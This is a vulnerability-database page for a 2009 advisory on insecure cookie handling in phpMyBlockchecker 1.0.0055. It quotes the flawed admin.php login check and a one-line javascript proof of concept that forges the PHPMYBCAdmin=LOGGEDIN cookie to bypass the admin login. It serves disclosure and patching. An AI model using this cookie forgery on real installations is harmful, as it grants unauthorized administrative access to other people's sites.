header-logo
Suggest Exploit
vendor:
phpMyBlockchecker
by:
SirGod
7,5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: phpMyBlockchecker
Affected Version From: 1.0.0055
Affected Version To: 1.0.0055
Patch Exists: YES
Related CWE: N/A
CPE: a:phpmyblockchecker:phpmyblockchecker:1.0.0055
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability

The vulnerability exists due to insufficient validation of user-supplied input in 'admin.php' script. A remote attacker can send a specially crafted HTTP request with a malicious cookie value to gain administrative access to the application.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

################################################################################################################
[+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#################################################################################################################

[+] Download Script :
http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884

[+] Insecure Cookie Handling

 - Vulnerable code in admin.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:<BR><form method=post><input type=password
name=password><input type=hidden value=login name=login><input
type=submit></form>");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC

    javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";
document.cookie = "1246371700; path=/";


#################################################################################################################

# milw0rm.com [2009-06-30]